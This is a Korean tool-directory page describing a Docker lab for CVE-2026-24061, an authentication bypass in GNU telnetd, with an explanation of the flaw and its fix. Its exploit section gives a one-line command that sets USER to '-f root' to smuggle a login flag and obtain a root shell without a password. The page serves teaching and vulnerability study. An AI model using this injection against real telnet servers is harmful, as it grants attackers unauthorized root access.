Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061_Lab — # CVE-2026-24061 교육용 Docker 랩 GNU telnetd의 인증 우회 취약점인 CVE-2026-24061을 시연하는 교육용 Docker 랩으로, USER 환경 변수의 인자 주입을 통해 루트 접근을 허용합니다. | Kitploit
도구/GitHubGitHub/gabs-hub/cve-2026-24061_lab
Vulnerability AnalysisExploitationAuthenticationLearning & EducationLabs & Practice
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

# CVE-2026-24061 교육용 Docker 랩 GNU telnetd의 인증 우회 취약점인 CVE-2026-24061을 시연하는 교육용 Docker 랩으로, USER 환경 변수의 인자 주입을 통해 루트 접근을 허용합니다.

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061 Telnetd Lab

이 저장소는 CVE-2026-24061 취약점을 시연하기 위한 간단한 Docker 실습 환경을 포함하고 있습니다. 이 취약점은 Linux의 GNU telnetd에서 인증 우회 및 root 접근을 허용합니다.

목적은 전적으로 교육용입니다.

요구 사항

  • Docker 설치
  • Telnet 클라이언트 설치

이미지 빌드

root@kitploit:~
docker build -t cve-2026-24061 .

컨테이너 실행

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

익스플로잇

다른 터미널에서 다음을 실행하세요:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

이후 비밀번호 요청 없이 root로 직접 접근이 허용됩니다.

참고 사항

  • 컨테이너는 취약한 버전의 GNU inetutils telnetd를 사용합니다
  • Telnet 서비스는 실제 환경에 노출되어서는 안 됩니다
  • 이 실습 환경은 연구 및 시연 목적으로만 사용하세요
  • 취약점은 어떻게 동작하나요?

    이 결함은 /usr/bin/login 유틸리티 호출 중 인수 주입으로 인해 발생합니다. telnetd는 login을 호출하는 데 사용되는 명령줄을 동적으로 구성하며, %U 플레이스홀더를 통해 USER 환경 변수 값을 어떠한 검증 없이 포함합니다.

    login 유틸리티는 비밀번호 인증을 무시하는 -f 옵션을 허용하므로, 공격자는 USER="-f root"를 설정하여 root로 직접 로그인을 강제할 수 있습니다.

    telnetd는 높은 권한으로 실행되므로, 이러한 조작은 유효한 자격 증명 없이 즉시 root 셸을 얻는 결과를 초래합니다. 익스플로잇은 간단하고 사전 상호작용이 필요하지 않으며 쉽게 자동화할 수 있어 CVSS 9.8 점수를 정당화합니다.

    이 취약점은 USER 변수에 대한 검증 및 검열 도입으로 수정되었으며, 하이픈으로 시작하는 값과 특수 문자를 차단하여 login에 대한 인수 주입을 방지합니다.

    도구 다운로드